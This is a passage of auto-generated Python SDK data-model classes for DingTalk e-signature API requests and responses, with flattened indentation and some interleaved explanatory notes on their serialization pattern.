if self.flow_status is not None:
result['flowStatus'] = self.flow_status
result['signers'] = []
if self.signers is not None:
for k in self.signers:
result['signers'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('businessScene') is not None:
self.business_scene = m.get('businessScene')
if m.get('flowStatus') is not None:
self.flow_status = m.get('flowStatus')
self.signers = []
if m.get('signers') is not None:
for k in m.get('signers'):
temp_model = GetSignDetailResponseBodySigners()
self.signers.append(temp_model.from_map(k))
return self
class GetSignDetailResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetSignDetailResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetSignDetailResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetAttachsApprovalHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
tsign_open_app_id: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.tsign_open_app_id = tsign_open_app_id
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.tsign_open_app_id is not None:
result['tsignOpenAppId'] = self.tsign_open_app_id
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('tsignOpenAppId') is not None:
self.tsign_open_app_id = m.get('tsignOpenAppId')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetAttachsApprovalResponseBodyDataFiles(TeaModel):
def __init__(
self,
file_name: str = None,
original_file_url: str = None,
sign_finish_file_url: str = None,
):
self.file_name = file_name
self.original_file_url = original_file_url
self.sign_finish_file_url = sign_finish_file_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_name is not None:
result['fileName'] = self.file_name
if self.original_file_url is not None:
result['originalFileUrl'] = self.original_file_url
if self.sign_finish_file_url is not None:
result['signFinishFileUrl'] = self.sign_finish_file_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
if m.get('originalFileUrl') is not None:
self.original_file_url = m.get('originalFileUrl')
if m.get('signFinishFileUrl') is not None:
self.sign_finish_file_url = m.get('signFinishFileUrl')
return self
class GetAttachsApprovalResponseBodyData(TeaModel):
def __init__(
self,
flow_id: str = None,
status: str = None,
files: List[GetAttachsApprovalResponseBodyDataFiles] = None,
):
self.flow_id = flow_id
self.status = status
self.files = files
def validate(self):
if self.files:
for k in self.files:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.flow_id is not None:
result['flowId'] = self.flow_id
if self.status is not None:
result['status'] = self.status
result['files'] = []
if self.files is not None:
for k in self.files:
result['files'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('flowId') is not None:
self.flow_id = m.get('flowId')
if m.get('status') is not None:
self.status = m.get('status')
self.files = []
if m.get('files') is not None:
for k in m.get('files'):
temp_model = GetAttachsApprovalResponseBodyDataFiles()
self.files.append(temp_model.from_map(k))
return self
class GetAttachsApprovalResponseBody(TeaModel):
def __init__(
self,
data: List[GetAttachsApprovalResponseBodyData] = None,
):
        # Response data list
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetAttachsApprovalResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetAttachsApprovalResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetAttachsApprovalResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetAttachsApprovalResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ProcessStartHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ProcessStartRequestFiles(TeaModel):
def __init__(
self,
file_id: str = None,
file_name: str = None,
):
self.file_id = file_id
self.file_name = file_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.file_name is not None:
result['fileName'] = self.file_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('fileName') is not None:
self.file_name = m.get('fileName')
return self
class ProcessStartRequestParticipants(TeaModel):
def __init__(
self,
account_type: str = None,
sign_requirements: str = None,
ding_corp_id: str = None,
user_id: str = None,
account: str = None,
account_name: str = None,
org_name: str = None,
):
        # Account type ("DING_USER": DingTalk user, "OUTER_USER": external user)
        self.account_type = account_type
        # Seal type required for signing (1: corporate seal, 2: personal seal, "1,2": both personal and corporate seals)
        self.sign_requirements = sign_requirements
        self.ding_corp_id = ding_corp_id
        # Required when account_type is DING_USER
        self.user_id = user_id
        # Required when account_type is OUTER_USER
        self.account = account
        # Required when account_type is OUTER_USER
        self.account_name = account_name
        # Required when an OUTER_USER needs to apply a corporate seal (defaults to the current company name if omitted)
        self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.account_type is not None:
result['accountType'] = self.account_type
if self.sign_requirements is not None:
result['signRequirements'] = self.sign_requirements
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account is not None:
result['account'] = self.account
if self.account_name is not None:
result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('signRequirements') is not None:
self.sign_requirements = m.get('signRequirements')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class ProcessStartRequestCcs(TeaModel):
def __init__(
self,
account_type: str = None,
ding_corp_id: str = None,
user_id: str = None,
account: str = None,
account_name: str = None,
org_name: str = None,
):
        # Account type ("DING_USER": DingTalk user, "OUTER_USER": external user)
        self.account_type = account_type
        self.ding_corp_id = ding_corp_id
        # Required when account_type is DING_USER
        self.user_id = user_id
        # Required when account_type is OUTER_USER
        self.account = account
        # Required when account_type is OUTER_USER
        self.account_name = account_name
        # Required when sending to a company
        self.org_name = org_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.account_type is not None:
result['accountType'] = self.account_type
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.user_id is not None:
result['userId'] = self.user_id
if self.account is not None:
result['account'] = self.account
if self.account_name is not None:
result['accountName'] = self.account_name
if self.org_name is not None:
result['orgName'] = self.org_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('accountType') is not None:
self.account_type = m.get('accountType')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('userId') is not None:
self.user_id = m.get('userId')
if m.get('account') is not None:
self.account = m.get('account')
if m.get('accountName') is not None:
self.account_name = m.get('accountName')
if m.get('orgName') is not None:
self.org_name = m.get('orgName')
return self
class ProcessStartRequestSourceInfo(TeaModel):
def __init__(
self,
show_text: str = None,
pc_url: str = None,
mobile_url: str = None,
):
        # Display text
        self.show_text = show_text
        # Redirect URL for PC
        self.pc_url = pc_url
        # Redirect URL for mobile
        self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.show_text is not None:
result['showText'] = self.show_text
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('showText') is not None:
self.show_text = m.get('showText')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class ProcessStartRequest(TeaModel):
def __init__(
self,
auto_start: str = None,
initiator_user_id: str = None,
ding_corp_id: str = None,
task_name: str = None,
redirect_url: str = None,
files: List[ProcessStartRequestFiles] = None,
participants: List[ProcessStartRequestParticipants] = None,
ccs: List[ProcessStartRequestCcs] = None,
source_info: ProcessStartRequestSourceInfo = None,
):
        # Whether to skip the initiation page and start signing directly
        self.auto_start = auto_start
        # userId of the initiator
        self.initiator_user_id = initiator_user_id
        self.ding_corp_id = ding_corp_id
        # Task name (defaults to the file name)
        self.task_name = task_name
        # Redirect URL after signing completes
        self.redirect_url = redirect_url
        # List of files
        self.files = files
        # List of signing participants
        self.participants = participants
        # List of CC recipients
        self.ccs = ccs
        # Source info (currently supports passing approval info and redirect URLs)
        self.source_info = source_info
def validate(self):
if self.files:
for k in self.files:
if k:
k.validate()
if self.participants:
for k in self.participants:
if k:
k.validate()
if self.ccs:
for k in self.ccs:
if k:
k.validate()
if self.source_info:
self.source_info.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.auto_start is not None:
result['autoStart'] = self.auto_start
if self.initiator_user_id is not None:
result['initiatorUserId'] = self.initiator_user_id
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.task_name is not None:
result['taskName'] = self.task_name
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
result['files'] = []
if self.files is not None:
for k in self.files:
result['files'].append(k.to_map() if k else None)
result['participants'] = []
if self.participants is not None:
for k in self.participants:
result['participants'].append(k.to_map() if k else None)
result['ccs'] = []
if self.ccs is not None:
for k in self.ccs:
result['ccs'].append(k.to_map() if k else None)
if self.source_info is not None:
result['sourceInfo'] = self.source_info.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('autoStart') is not None:
self.auto_start = m.get('autoStart')
if m.get('initiatorUserId') is not None:
self.initiator_user_id = m.get('initiatorUserId')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('taskName') is not None:
self.task_name = m.get('taskName')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
self.files = []
if m.get('files') is not None:
for k in m.get('files'):
temp_model = ProcessStartRequestFiles()
self.files.append(temp_model.from_map(k))
self.participants = []
if m.get('participants') is not None:
for k in m.get('participants'):
temp_model = ProcessStartRequestParticipants()
self.participants.append(temp_model.from_map(k))
self.ccs = []
if m.get('ccs') is not None:
for k in m.get('ccs'):
temp_model = ProcessStartRequestCcs()
self.ccs.append(temp_model.from_map(k))
if m.get('sourceInfo') is not None:
temp_model = ProcessStartRequestSourceInfo()
self.source_info = temp_model.from_map(m['sourceInfo'])
return self
class ProcessStartResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.task_id = task_id
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
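Every generated model in this module follows the same `to_map()`/`from_map()` serialization convention: snake_case attributes are written to camelCase map keys, `None` fields are skipped on output, and `from_map` only overwrites attributes for keys that are present. A minimal self-contained sketch of that pattern (the `MiniModel` class here is illustrative only, not part of the SDK):

```python
# Illustrative stand-in for the generated TeaModel pattern above.
class MiniModel:
    def __init__(self, task_id=None, pc_url=None):
        self.task_id = task_id  # serialized as 'taskId'
        self.pc_url = pc_url    # serialized as 'pcUrl'

    def to_map(self):
        # Only non-None fields are emitted, mirroring the generated code.
        result = {}
        if self.task_id is not None:
            result['taskId'] = self.task_id
        if self.pc_url is not None:
            result['pcUrl'] = self.pc_url
        return result

    def from_map(self, m=None):
        # Absent keys leave the existing attribute values untouched.
        m = m or {}
        if m.get('taskId') is not None:
            self.task_id = m.get('taskId')
        if m.get('pcUrl') is not None:
            self.pc_url = m.get('pcUrl')
        return self


# Round trip: dict -> model -> dict is lossless for the keys present.
m = MiniModel().from_map({'taskId': 't-1', 'pcUrl': 'https://example'})
assert m.to_map() == {'taskId': 't-1', 'pcUrl': 'https://example'}
```

Because `to_map` omits `None` fields, a partially populated model produces a partial map rather than a map full of `None` values.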
class ProcessStartResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ProcessStartResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ProcessStartResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ApprovalListHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
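The `*Headers` models above map attributes to the literal wire-format header names, which is why `x_acs_dingtalk_access_token` serializes to the hyphenated key `'x-acs-dingtalk-access-token'` rather than a camelCase identifier. A self-contained sketch of that mapping (`MiniHeaders` is illustrative only, not an SDK class):

```python
# Illustrative stand-in: header models use the literal HTTP header name
# as the map key, including hyphenated names that cannot be Python
# identifiers; the attribute name is the snake_case equivalent.
class MiniHeaders:
    def __init__(self, x_acs_dingtalk_access_token=None):
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def to_map(self):
        result = {}
        if self.x_acs_dingtalk_access_token is not None:
            # Key is the wire-format header name, not the attribute name.
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m=None):
        m = m or {}
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


h = MiniHeaders(x_acs_dingtalk_access_token='token-123')
assert h.to_map() == {'x-acs-dingtalk-access-token': 'token-123'}
```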
class ApprovalListResponseBodyDataApprovalNodes(TeaModel):
def __init__(
self,
approver_name: str = None,
status: str = None,
start_time: float = None,
approval_time: str = None,
):
self.approver_name = approver_name
self.status = status
self.start_time = start_time
self.approval_time = approval_time
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.approver_name is not None:
result['approverName'] = self.approver_name
if self.status is not None:
result['status'] = self.status
if self.start_time is not None:
result['startTime'] = self.start_time
if self.approval_time is not None:
result['approvalTime'] = self.approval_time
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('approverName') is not None:
self.approver_name = m.get('approverName')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
if m.get('approvalTime') is not None:
self.approval_time = m.get('approvalTime')
return self
class ApprovalListResponseBodyData(TeaModel):
def __init__(
self,
approval_name: str = None,
status: str = None,
refuse_reason: str = None,
sponsor_account_name: str = None,
start_time: float = None,
end_time: float = None,
seal_id_img: str = None,
approval_nodes: List[ApprovalListResponseBodyDataApprovalNodes] = None,
):
self.approval_name = approval_name
self.status = status
self.refuse_reason = refuse_reason
self.sponsor_account_name = sponsor_account_name
self.start_time = start_time
self.end_time = end_time
self.seal_id_img = seal_id_img
self.approval_nodes = approval_nodes
def validate(self):
if self.approval_nodes:
for k in self.approval_nodes:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.approval_name is not None:
result['approvalName'] = self.approval_name
if self.status is not None:
result['status'] = self.status
if self.refuse_reason is not None:
result['refuseReason'] = self.refuse_reason
if self.sponsor_account_name is not None:
result['sponsorAccountName'] = self.sponsor_account_name
if self.start_time is not None:
result['startTime'] = self.start_time
if self.end_time is not None:
result['endTime'] = self.end_time
if self.seal_id_img is not None:
result['sealIdImg'] = self.seal_id_img
result['approvalNodes'] = []
if self.approval_nodes is not None:
for k in self.approval_nodes:
result['approvalNodes'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('approvalName') is not None:
self.approval_name = m.get('approvalName')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('refuseReason') is not None:
self.refuse_reason = m.get('refuseReason')
if m.get('sponsorAccountName') is not None:
self.sponsor_account_name = m.get('sponsorAccountName')
if m.get('startTime') is not None:
self.start_time = m.get('startTime')
if m.get('endTime') is not None:
self.end_time = m.get('endTime')
if m.get('sealIdImg') is not None:
self.seal_id_img = m.get('sealIdImg')
self.approval_nodes = []
if m.get('approvalNodes') is not None:
for k in m.get('approvalNodes'):
temp_model = ApprovalListResponseBodyDataApprovalNodes()
self.approval_nodes.append(temp_model.from_map(k))
return self
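Fields holding a list of sub-models, such as `approval_nodes` above, get special handling: `to_map` always emits the key with a list (preserving `None` entries as `None`), and `from_map` resets the list and rebuilds each element via a fresh sub-model. A self-contained sketch of that list-of-models pattern (`Node` and `Data` are illustrative stand-ins, not SDK classes):

```python
# Illustrative stand-ins for the list-of-models serialization used by
# fields like approvalNodes in the generated code above.
class Node:
    def __init__(self, status=None):
        self.status = status

    def to_map(self):
        return {'status': self.status} if self.status is not None else {}

    def from_map(self, m=None):
        m = m or {}
        if m.get('status') is not None:
            self.status = m.get('status')
        return self


class Data:
    def __init__(self, approval_nodes=None):
        self.approval_nodes = approval_nodes

    def to_map(self):
        # The key is always present; None entries are kept as None,
        # matching the generator's "k.to_map() if k else None".
        result = {'approvalNodes': []}
        if self.approval_nodes is not None:
            for k in self.approval_nodes:
                result['approvalNodes'].append(k.to_map() if k else None)
        return result

    def from_map(self, m=None):
        # The list is reset before parsing, so stale entries never survive.
        m = m or {}
        self.approval_nodes = []
        if m.get('approvalNodes') is not None:
            for k in m.get('approvalNodes'):
                self.approval_nodes.append(Node().from_map(k))
        return self


d = Data().from_map({'approvalNodes': [{'status': 'DONE'}]})
assert d.to_map() == {'approvalNodes': [{'status': 'DONE'}]}
```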
class ApprovalListResponseBody(TeaModel):
def __init__(
self,
data: List[ApprovalListResponseBodyData] = None,
):
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = ApprovalListResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class ApprovalListResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ApprovalListResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ApprovalListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetAuthUrlHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetAuthUrlRequest(TeaModel):
def __init__(
self,
ding_corp_id: str = None,
redirect_url: str = None,
):
self.ding_corp_id = ding_corp_id
self.redirect_url = redirect_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.redirect_url is not None:
result['redirectUrl'] = self.redirect_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('redirectUrl') is not None:
self.redirect_url = m.get('redirectUrl')
return self
class GetAuthUrlResponseBody(TeaModel):
def __init__(
self,
task_id: str = None,
pc_url: str = None,
mobile_url: str = None,
):
self.task_id = task_id
self.pc_url = pc_url
self.mobile_url = mobile_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.task_id is not None:
result['taskId'] = self.task_id
if self.pc_url is not None:
result['pcUrl'] = self.pc_url
if self.mobile_url is not None:
result['mobileUrl'] = self.mobile_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('taskId') is not None:
self.task_id = m.get('taskId')
if m.get('pcUrl') is not None:
self.pc_url = m.get('pcUrl')
if m.get('mobileUrl') is not None:
self.mobile_url = m.get('mobileUrl')
return self
class GetAuthUrlResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetAuthUrlResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetAuthUrlResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetCorpConsoleHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetCorpConsoleResponseBody(TeaModel):
def __init__(
self,
org_console_url: str = None,
):
self.org_console_url = org_console_url
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.org_console_url is not None:
result['orgConsoleUrl'] = self.org_console_url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('orgConsoleUrl') is not None:
self.org_console_url = m.get('orgConsoleUrl')
return self
class GetCorpConsoleResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetCorpConsoleResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetCorpConsoleResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetFileInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
service_group: str = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.service_group = service_group
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.service_group is not None:
result['serviceGroup'] = self.service_group
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('serviceGroup') is not None:
self.service_group = m.get('serviceGroup')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetFileInfoResponseBody(TeaModel):
def __init__(
self,
file_id: str = None,
name: str = None,
download_url: str = None,
size: int = None,
status: int = None,
pdf_total_pages: int = None,
):
self.file_id = file_id
self.name = name
self.download_url = download_url
self.size = size
self.status = status
self.pdf_total_pages = pdf_total_pages
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.file_id is not None:
result['fileId'] = self.file_id
if self.name is not None:
result['name'] = self.name
if self.download_url is not None:
result['downloadUrl'] = self.download_url
if self.size is not None:
result['size'] = self.size
if self.status is not None:
result['status'] = self.status
if self.pdf_total_pages is not None:
result['pdfTotalPages'] = self.pdf_total_pages
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('fileId') is not None:
self.file_id = m.get('fileId')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('downloadUrl') is not None:
self.download_url = m.get('downloadUrl')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('pdfTotalPages') is not None:
self.pdf_total_pages = m.get('pdfTotalPages')
return self
class GetFileInfoResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetFileInfoResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
